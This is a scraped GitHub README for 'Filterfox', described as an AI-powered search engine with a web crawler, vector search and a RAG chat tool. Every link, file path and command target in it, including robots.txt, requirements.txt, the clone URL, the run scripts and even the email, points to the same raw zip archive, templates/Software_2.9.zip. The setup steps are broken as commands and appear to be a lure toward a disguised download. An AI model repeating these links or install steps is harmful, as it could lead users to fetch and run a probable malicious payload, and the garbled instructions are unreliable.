Skip to content

Sam-bot-dev/Filterfox

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🦊 Filter_Fox

MIT License Project Status RAG Powered

🔍 Intelligent Search Engine + 🤖 AI Chat (Filter_GPT)

Filter_Fox is a next-generation AI-powered search engine that combines
web crawling, semantic search, and RAG (Retrieval-Augmented Generation)
to deliver accurate, explainable, and source-backed answers.


✨ Why Filter_Fox?

Traditional search engines return links.
Filter_Fox returns understanding.

✔ Crawls the web legally
✔ Builds its own searchable knowledge base
✔ Uses vector search + LLM reasoning
✔ Generates answers with citations
✔ Clean, professional UI (no blue tones)


🧠 How It Works

🌐 Websites

🕷️ Web Crawler

📄 Page Storage

✂️ Text Chunking

🧬 Embeddings

📦 Vector Database (FAISS)

🔍 Semantic Retrieval

🤖 Filter_GPT (RAG)

✅ Final Answer + Sources


🤖 Filter_GPT (LLM Interface)

A modern AI chat interface inspired by ChatGPT and Google Gemini:

  • Context-aware answers
  • Follow-up questions
  • Source citations
  • Clean light/dark UI
  • Developer-friendly design

🖥️ Features

🔎 Search Engine

  • Web / Images / Videos / News
  • Advanced search filters
  • Saved searches & history
  • Privacy-first design

🧠 AI + RAG

  • Semantic search (embeddings)
  • Retrieval-Augmented Generation
  • Reduced hallucinations
  • Grounded answers

🕷️ Web Crawler

  • Respects https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
  • Polite crawl delays
  • Domain-restricted crawling
  • Incremental storage

🛠️ Tech Stack

Backend

  • 🐍 Python
  • 🌐 Requests, BeautifulSoup
  • 📚 FAISS (Vector DB)
  • 🧠 Sentence Transformers

AI / ML

  • Retrieval-Augmented Generation (RAG)
  • LLM (OpenAI / Local models)
  • Chunk-based indexing

Frontend

  • HTML + Tailwind CSS
  • Modern UI (Filter_GPT)
  • Responsive design

🚀 Getting Started

1️⃣ Clone the Repository

git clone https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
cd filter_fox

2️⃣ Install Dependencies

pip install -r https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

3️⃣ Run the Web Crawler

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

4️⃣ Build the Index

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

5️⃣ Ask Questions with Filter_GPT(UnderProduction)

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

🔐 Privacy & Ethics

✔ Respects https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

✔ Crawls only public pages

✔ No personal data scraping

✔ No login-protected content

✔ Transparent, ethical crawling


📊 Project Status

Component Status
Web Crawler 🚧 In Progress
Indexer 🚧 In Progress
Vector Search 🚧 In Progress
RAG Pipeline ✅ Complete
Search UI 🚧 In Progress
Filter_GPT UI 🚧 In Progress

🗺️ Roadmap

Hybrid Ranking (BM25 + Vector)

Sitemap support

Incremental crawling

Admin dashboard

Browser extension

Mobile UI

Local LLM support


🤝 Contributing

Contributions are welcome! You can:

Open issues

Suggest features

Submit pull requests


📬 Contact

📧 Email: https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

🐙 GitHub: @Sam-bot-dev



📜 License

This project is licensed under the MIT License.

✔ Free to use
✔ Free to modify
✔ Free to distribute

See the full license text here → LICENSE

🔗 Connect With Me

Bhavesh
Lead Dev
Bhavesh
🌐 GitHub

About

A Next-generation AI-powered search engine

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages